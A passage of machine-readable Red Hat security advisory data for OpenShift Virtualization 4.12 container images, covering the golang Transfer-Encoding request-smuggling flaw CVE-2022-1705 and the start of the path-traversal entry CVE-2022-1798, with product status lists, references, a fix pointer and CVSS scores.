"8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2107374", }, ], notes: [ { category: "description", text: "A flaw was found in golang. The HTTP/1 client accepted invalid Transfer-Encoding headers indicating \"chunked\" encoding. This issue could allow request smuggling, but only if combined with an intermediate server that also improperly accepts the header as invalid.", title: "Vulnerability description", }, { category: "summary", text: "golang: net/http: improper sanitization of Transfer-Encoding header", title: "Vulnerability summary", }, { category: "other", text: "Within regulated environments, a combination of the following controls acts as a significant barrier to successfully exploiting a CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling') vulnerability and therefore downgrades the severity of this particular CVE from Moderate to Low.\n\nThe platform uses secure, encrypted HTTPS connections over TLS 1.2 to reduce the risk of smuggling attacks by preventing the injection of ambiguous or malformed requests between components. The environment employs IPS/IDS and antimalware solutions to detect and block malicious code while ensuring consistent interpretation of HTTP requests across network layers, mitigating request/response inconsistencies. Event logs are collected and analyzed for centralization, correlation, monitoring, alerting, and retention, enabling the detection of malformed or suspicious HTTP traffic. Static code analysis and peer reviews enforce strong input validation and error handling to ensure all user inputs adhere to HTTP protocol specifications.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-1705", }, { category: "external", summary: "RHBZ#2107374", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-1705", url: "https://www.cve.org/CVERecord?id=CVE-2022-1705", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-1705", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-1705", }, { category: "external", summary: "https://go.dev/issue/53188", url: "https://go.dev/issue/53188", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", url: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", }, ], release_date: "2022-07-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: net/http: improper sanitization of Transfer-Encoding header", }, { acknowledgments: [ { names: [ "Oliver Brooks and James Klopchic", ], organization: "NCC Group", }, ], cve: "CVE-2022-1798", cwe: { id: "CWE-22", name: "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", }, discovery_date: "2022-08-12T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", 